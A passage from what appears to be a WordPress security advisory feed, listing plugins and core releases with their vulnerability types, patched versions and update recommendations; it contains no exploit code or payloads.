Recommended Action: Update to version 1.1.1.8, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 4.21.86
Recommended Action: Update to version 4.21.86, or a newer patched version

Plugin: WP User Profile Avatar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Music Store – WordPress eCommerce

Vulnerability: Open Redirect
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: Contact Form – Custom Builder, Payment Form, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.176
Recommended Action: Update to version 1.8.176, or a newer patched version

Plugin: Rock Convert

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Unite Gallery Lite

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Sabre

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.7.9.2
Patched Version: 3.7.9.3
Recommended Action: Update to version 3.7.9.3, or a newer patched version

Plugin: JustTables – WooCommerce Product Table

Vulnerability: Cross-Site Request Forgery via plugin_activation()
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Thrive Optimize

Vulnerability: Arbitrary Options Update
Patched Version: 1.4.13.3
Recommended Action: Update to version 1.4.13.3, or a newer patched version

Plugin: We’re Open!

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.46
Recommended Action: Update to version 1.46, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.19
Recommended Action: Update to version 2.5.19, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: WP Social Comments

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Settings Change
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘mep_get_option’ function
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Arbitrary File Upload via Bypass
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: BuddyPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Bulk Delete

Vulnerability: Missing Authorization
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.8
Recommended Action: Update to version 6.8.8, or a newer patched version

Plugin: Syncee for Suppliers

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Axact Author List Widget

Vulnerability: SQL Injection
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: ContentStudio

Vulnerability: Authorization Bypass
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: WP-Optimize – Cache, Compress images, Minify & Clean database to boost page speed & performance

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Download Monitor

Vulnerability: Missing Authorization
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.9.41
Recommended Action: Update to version 1.9.9.41, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[post_type][page]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Slider Carousel – Image Slider

Vulnerability: Missing Authorization
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Client Portal – Private user pages and login

Vulnerability: Cross-Site Request Forgery via cp_create_private_pages_for_all_users
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.20
Recommended Action: Update to version 2.1.20, or a newer patched version

Plugin: Fusion Engage

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Missing Authorization
Patched Version: 10.41
Recommended Action: Update to version 10.41, or a newer patched version

Plugin: Branda – Branda – White Label & Branding, Custom Login Page Customizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.9
Recommended Action: Update to version 3.4.9, or a newer patched version

Plugin: Hreflang Manager – Hreflang Implementation for International SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.07
Recommended Action: Update to version 1.07, or a newer patched version

Plugin: Fontiran

Plugin: One User Avatar | User Profile Picture

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.28
Recommended Action: Update to version 3.4.28, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.50
Recommended Action: Update to version 4.0.50, or a newer patched version

Plugin: Awin Data Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_clone_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Snap Pixel

Core: WordPress

Vulnerability: Authenticated Arbitrary File Deletion
Patched Version: 3.7.27
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.27, 3.8.27, 3.9.25, 4.0.24, 4.1.24, 4.2.21, 4.3.17, 4.4.16, 4.5.15, 4.6.12, 4.7.11, 4.8.7, 4.9.7

Plugin: WP iCal Availability

Plugin: Polylang

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Authenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Server Health Stats

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Justified Gallery

Vulnerability: Missing Authorization via ‘dismiss_how_to_use_notice’ and ‘dismiss_notice’
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated Local File Inclusion & SQL injection
Patched Version: 2.1.57
Recommended Action: Update to version 2.1.57, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Missing Authorization via cnss_save_ajax_order
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Read and Understood

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.88.5
Recommended Action: Update to version 2.88.5, or a newer patched version

Plugin: Music Store – WordPress eCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.43
Recommended Action: Update to version 1.0.43, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting via range Parameter
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Post Connector Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Privilege Escalation via REST API
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: User Avatar – Reloaded

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Name
Patched Version: 21.5.1
Recommended Action: Update to version 21.5.1, or a newer patched version

Plugin: Simple File List

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.0.10
Recommended Action: Update to version 6.0.10, or a newer patched version

Plugin: Smart Google Code Inserter

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Product Expiry for WooCommerce

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Settings Update
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: ContentStudio

Vulnerability: Missing Authorization
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Missing Authorization
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Landing Page Builder – Free Landing Page Templates

Vulnerability: Local File Inclusion via ‘lpp_template_select’
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: gallery-objects

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: SQL Injection
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: photosmash-galleries

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Content Injection
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Powerplay Gallery

Plugin: Fotobook

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Code Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Wise Chat

Vulnerability: Reverse Tabnabbing
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: wp-mpdf

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Visual Composer Website Builder

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 27.0
Recommended Action: Update to version 27.0, or a newer patched version

Plugin: Perfect Brands for WooCommerce

Vulnerability: Unauthorized Brand Creation
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: eVision Responsive Column Layout Shortcodes

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: SQL injection
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: Serial Codes Generator and Validator with WooCommerce Support

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.4.15
Recommended Action: Update to version 2.4.15, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Notification Bar for WordPress

Plugin: Media Library Assistant

Vulnerability: Local File Inclusion
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: Marker.io – Visual Website Feedback

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.31.5
Recommended Action: Update to version 2.31.5, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Cache Images

Vulnerability: Cross-Site Request Forgery to Image Upload
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Missing Authorization to Sensitive Key Disclosure/Update
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Display Custom Fields – wpView

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: WP eBay Product Feeds

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Unyson

Vulnerability: Sensitive Information Exposure
Patched Version: 2.7.19
Recommended Action: Update to version 2.7.19, or a newer patched version

Plugin: GoUrl Bitcoin Payment Gateway & Paid Downloads & Membership

Vulnerability: Arbitrary File Upload
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: SEO Change Monitor – Track Website Changes

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Stored Cross-Site Scripting in Admin Dashboard
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Plug your WooCommerce into the largest catalog of customized print products from Helloprint

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via Shortcode Previews
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.13, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: The Events Calendar

Vulnerability: Missing Authorization
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: BuddyPress xProfile Checkout Manager for WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Cost Calculator

Plugin: Media File Manager

Vulnerability: Directory Traversal to Arbitrary File Relocation
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Newsletter Plugin – Noptin

Vulnerability: Open Redirect
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Live Gold Price & Silver Price Charts Widgets

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.36.1
Recommended Action: Update to version 5.36.1, or a newer patched version

Plugin: FrieChat – WordPress Chat Plugin

Vulnerability: WordPress Chat Plugin < 1.0.3
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Yoast SEO Premium

Vulnerability: Missing Authorization to Zapier Key Reset
Patched Version: 20.5
Recommended Action: Update to version 20.5, or a newer patched version

Plugin: picturesurf-gallery

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.0.6.1
Recommended Action: Update to version 1.0.6.1, or a newer patched version

Plugin: Easy US Sales Taxes Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WordPress Related Posts

Plugin: User IP and Location

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Insufficient Input Validation to Unauthenticated Stored Cross-Site Scripting and Arbitrary Usermeta Update
Patched Version: 7.5.39.7212
Recommended Action: Update to version 7.5.39.7212, or a newer patched version

Plugin: commentator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Missing Authorization
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: OoohBoi Steroids for Elementor

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Image Upload
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: AFI – The Easiest Integration Plugin

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.76.0
Recommended Action: Update to version 1.76.0, or a newer patched version

Plugin: Really Simple Google Tag Manager (GTM)

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Cross-Site Scripting
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Inactive Logout

Vulnerability: Missing Authorization
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: SQL Injection
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Saphali Woocommerce Lite

Vulnerability: Cross-Site Request Forgery via ‘woocommerce_saphali_page_s_l’
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: DW Question Answer Pro

Plugin: Next Page

Plugin: Easy Social Icons

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Starter Sites & Templates by Neve

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Download Manager

Vulnerability: Privilege Escalation
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Responsive Slick Slider WordPress

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OneLogin SAML SSO

Vulnerability: Authentication Bypass
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: 10WebSocial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.29
Recommended Action: Update to version 1.4.29, or a newer patched version

Plugin: Google Photos Gallery with Shortcodes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Missing Authorization
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Cross-Site Request Forgery via update_project
Patched Version: 12.4.1
Recommended Action: Update to version 12.4.1, or a newer patched version

Plugin: Realty Workstation

Vulnerability: Authenticated SQL Injection
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: shortcode-ninja

Plugin: WP Abstracts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Soundslides

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via media-playlists
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Product Vendors

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Phone Orders for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.10
Recommended Action: Update to version 2.2.10, or a newer patched version

Plugin: Push Notifications for WordPress (Lite)

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Advanced Text Widget

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Link Whisper Free

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 0.6.6
Recommended Action: Update to version 0.6.6, or a newer patched version

Plugin: Category Order and Taxonomy Terms Order

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Authenticated(Editor+) Arbitrary File Upload
Patched Version: 2.8.22
Recommended Action: Update to version 2.8.22, or a newer patched version

Plugin: Toolpage

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Status Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: FreeMind WP Browser

Plugin: Media Library Assistant

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Recipes Writer

Plugin: TablePress – Tables in WordPress made easy

Vulnerability: XML External Entity Injection
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Jigoshop Swipe plugin

Plugin: Freshmail for WordPress

Vulnerability: Multiple SQL Injections
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.6.13
Recommended Action: Update to version 4.6.13, or a newer patched version

Plugin: Page/Post Content Shortcode

Plugin: WP Category Post List Widget

Vulnerability: Cross-Site Request Forgery via gen_set_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Quotation

Plugin: Payment forms, Buy now buttons, and Invoicing System | GetPaid

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: GD bbPress Attachments

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Authentication Bypass
Patched Version: 1.1.60
Recommended Action: Update to version 1.1.60, or a newer patched version

Plugin: Form Lightbox

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Arbitrary Settings Change
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Gallery for Social Photo

Vulnerability: Cross-Site Request Forgery to Post Duplication
Patched Version: 1.0.0.29
Recommended Action: Update to version 1.0.0.29, or a newer patched version

Plugin: Job Manager & Career – Manage job board listings, and recruitments

Vulnerability: Sensitive Information Exposure
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: content_timeline

Vulnerability: SQL Injection
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass to Remove Category Attribute
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Simple Org Chart

Plugin: Customize WordPress Emails and Alerts – Better Notifications for WP

Vulnerability: Email Address Disclosure
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated(Subscriber+) Privilege Escalation
Patched Version: 4.0.11
Recommended Action: Update to version 4.0.11, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.15.20
